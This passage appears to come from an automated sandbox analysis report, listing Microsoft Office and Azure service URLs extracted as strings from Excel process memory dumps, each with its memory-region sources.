    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizee
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizefic
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeizeB
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizej
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeq
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
    Source: EXCEL.EXE, 00000001.00000002.579029622.0000000012CD0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizest
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizet
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeu
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizev
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1MBI_SSL_SHORT
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1w
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://management.azure.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://management.azure.com/
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/t
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://messaging.office.com/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech/F
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ncus.contentsync.
    Source: EXCEL.EXE, 00000001.00000003.494676351.0000000012EE8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580094671.0000000012EEA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmpString found in binary or memory: https://ncus.paaz
    Source: EXCEL.EXE, 00000001.00000003.422011923.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.435352332.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456373840.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581020691.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439375212.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494762665.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382579863.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461680797.00000000130A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421133082.00000000130A6000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: EXCEL.EXE, 00000001.00000003.382185365.0000000015AE1000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapcom/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/R
    Source: EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382692648.000000000F62C000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
    Source: EXCEL.EXE, 00000001.00000003.282488457.00000000130A6000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com:443/nexus/rules?Applic
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordDF
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordhttps://login.windows.net/co
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365auditrealtimeingestion.manage.office.comBearer
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netRx
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://ocos-office365-s2s.msedge.net/abe
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officeapps.live.com
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com$
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com.
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com2
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com6
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.com8
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comL
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comP
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comZ
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comb
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comd
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comn
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comv
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmpString found in binary or memory: https://officeapps.live.comx
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
